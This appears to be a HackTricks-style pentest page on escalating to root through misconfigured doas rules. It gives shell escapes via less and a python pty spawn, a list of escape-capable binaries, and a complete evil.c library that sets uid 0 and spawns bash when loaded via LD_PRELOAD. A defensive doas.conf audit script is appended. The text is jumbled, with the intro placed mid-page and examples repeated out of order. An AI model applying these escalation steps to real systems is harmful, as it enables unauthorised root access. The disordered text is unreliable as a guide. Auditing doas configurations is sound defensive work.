
HackTricks Doas

    permit user1 as root cmd /usr/bin/less

    doas less /etc/hosts
    # then type: !/bin/bash

Known binaries for escapes: less, more, vi, vim, nano, awk, find, man, git, tmux, screen, ftp, irb, lua, perl, python, ruby, scp, tar.

If keepenv is set, doas keeps LD_PRELOAD, LD_LIBRARY_PATH, PYTHONPATH, etc.

    permit nopass user1 as root cmd /usr/bin/*

Try:

    permit keepenv user1 as root

Compile a malicious lib:

In this post, we’ll break down how doas works, where to find it, and how to abuse it for privilege escalation during a pentest. doas originated in OpenBSD. It lets users execute commands as another user (usually root) and is driven by a minimal configuration file: /etc/doas.conf.

    doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")'

Many binaries allow shell escapes.

    permit user1 as root cmd /usr/bin/less

    doas less

    // evil.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    // Constructor: runs as soon as the library is loaded
    __attribute__((constructor))
    void init() {
        setuid(0);
        setgid(0);
        system("/bin/bash");
    }
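For the defensive side of the rules shown above, this added example (not from HackTricks or the original post) audits a doas.conf for the patterns the post calls out: a cmd pointing at a shell-escape binary, nopass with a wildcard cmd, keepenv, and a rule with no cmd at all. The function names, risk tags and sample config are assumptions made for illustration.

```python
import os
import shlex

# Binaries this page lists as offering shell escapes.
ESCAPE_BINARIES = {
    "less", "more", "vi", "vim", "nano", "awk", "find", "man", "git", "tmux",
    "screen", "ftp", "irb", "lua", "perl", "python", "ruby", "scp", "tar",
}
FLAGS = {"nopass", "nolog", "persist", "keepenv"}  # doas.conf rule options

def audit_rule(line):
    """Return risk tags (hypothetical names) for one doas.conf rule."""
    tokens = shlex.split(line, comments=True)
    if not tokens or tokens[0] != "permit":
        return []  # blank lines, comments and deny rules grant nothing
    tokens, flags = tokens[1:], set()
    while tokens and (tokens[0] in FLAGS or tokens[0] == "setenv"):
        if tokens[0] == "setenv":  # skip the "{ VAR=value ... }" block
            end = next((i for i, t in enumerate(tokens) if "}" in t), len(tokens) - 1)
            tokens = tokens[end + 1:]
        else:
            flags.add(tokens.pop(0))
    findings = sorted(flags & {"keepenv", "nopass"})
    rest = tokens[tokens.index("cmd") + 1:] if "cmd" in tokens else []
    if not rest:
        return findings + ["any-command"]  # no cmd clause: nothing is restricted
    if "*" in rest[0]:
        findings.append("wildcard-cmd")  # e.g. /usr/bin/* as quoted on the page
    name = os.path.basename(rest[0]).rstrip("0123456789.")  # python3 -> python
    if name in ESCAPE_BINARIES:
        findings.append("shell-escape:" + name)
    return findings

def audit_config(text):
    """Map 1-based line number -> risk tags for every flagged rule."""
    rules = enumerate(text.splitlines(), 1)
    return {n: tags for n, line in rules if (tags := audit_rule(line))}

# Constructed sample: the three rules quoted on this page plus one narrow rule.
SAMPLE = """\
# constructed doas.conf
permit user1 as root cmd /usr/bin/less
permit nopass user1 as root cmd /usr/bin/*
permit keepenv user1 as root
permit persist user2 as root cmd /usr/sbin/reboot
"""

if __name__ == "__main__":
    for number, tags in audit_config(SAMPLE).items():
        print(f"line {number}: {', '.join(tags)}")
```

Run it against a copy of /etc/doas.conf by passing the file's text to `audit_config`; any flagged line is a candidate for tightening to a fixed command with fixed arguments.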

— HackTricks

Want more? Check out the HackTricks Linux Privilege Escalation guide for deeper dives.

Keep hacking. Keep escalating.
